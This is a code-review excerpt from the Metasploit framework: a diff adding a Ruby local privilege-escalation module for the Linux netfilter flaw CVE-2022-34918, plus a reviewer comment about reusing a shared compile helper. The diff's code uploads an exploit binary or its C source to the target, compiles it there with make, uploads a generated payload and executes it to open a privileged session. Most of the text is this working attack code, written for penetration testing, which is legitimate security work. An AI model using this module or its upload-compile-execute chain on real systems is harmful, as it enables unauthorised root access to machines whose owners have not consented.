modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb

```diff
@@ -0,0 +1,208 @@
+        OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/tmp'])
+      ]
+    )
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  def upload_exploit_binary
+    @executable_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))
+    upload_and_chmodx(@executable_path, exploit_data('CVE-2022-34918', 'ubuntu.elf'))
+    register_file_for_cleanup(@executable_path)
+  end
+
+  def upload_payload_binary
+    @payload_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))
+    upload_and_chmodx(@payload_path, generate_payload_exe)
+    register_file_for_cleanup(@payload_path)
+  end
+
+  def upload_source
+    @exploit_source_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))
+    mkdir(@exploit_source_path)
+    dirs = [ '.' ]
+    until dirs.empty?
+      current_dir = dirs.pop
+      dir_full_path = ::File.join(::Msf::Config.install_root, 'external/source/exploits/CVE-2022-34918', current_dir)
+      Dir.entries(dir_full_path).each do |ent|
+        next if ent == '.' || ent == '..'
+
+        full_path_host = ::File.join(dir_full_path, ent)
+        relative_path = ::File.join(current_dir, ent)
+        full_path_target = ::File.join(@exploit_source_path, current_dir, ent)
+        if File.file?(full_path_host)
+          vprint_status("Uploading #{relative_path} to #{full_path_target}")
+          upload_file(full_path_target, full_path_host)
+        elsif File.directory?(full_path_host)
+          vprint_status("Creating the directory #{full_path_target}")
+          mkdir(full_path_target)
+          dirs.push(relative_path)
+        else
+          print_error("#{full_path_host} doesn't look like a file or a directory")
+        end
+      end
+    end
+    register_dir_for_cleanup(@exploit_source_path)
+  end
+
+  def compile_source
+    fail_with(Failure::BadConfig, 'make command not available on the target') unless command_exists?('make')
+    info = cmd_exec("make -C #{@exploit_source_path}")
+    vprint_status(info)
+    @executable_path = ::File.join(@exploit_source_path, 'ubuntu.elf')
+    if exists?(@executable_path)
+      chmod(@executable_path, 0o700) unless executable?(@executable_path)
+      print_good('Compilation was successful')
+    else
+      fail_with(Failure::UnexpectedReply, 'Compilation has failed (executable not found)')
+    end
+  end
+
+  def run_payload
+    info = cmd_exec(@executable_path, @payload_path)
+    info.each_line do |line|
+      print_status(line.chomp)
+    end
+    print_status('Payload executed! If it was successful, a session should have been created')
+  end
+
+  def get_external_source_code(cve, file)
+    file_path = ::File.join(::Msf::Config.install_root, "external/source/exploits/#{cve}/#{file}")
+    ::File.binread(file_path)
+  end
+
+  def strip_comments(c_code)
```

Comment:
This is available from the post Linux compile library.  I know it has been redefined everywhere, but I'd love it if we could start using one standard one to maintain consistent behavior. https://github.com/rapid7/metasploit-framework/blob/b8f6e2d5490c6b258c479bb038ab1e084c29966a/lib/msf/core/post/linux/compile.rb#L56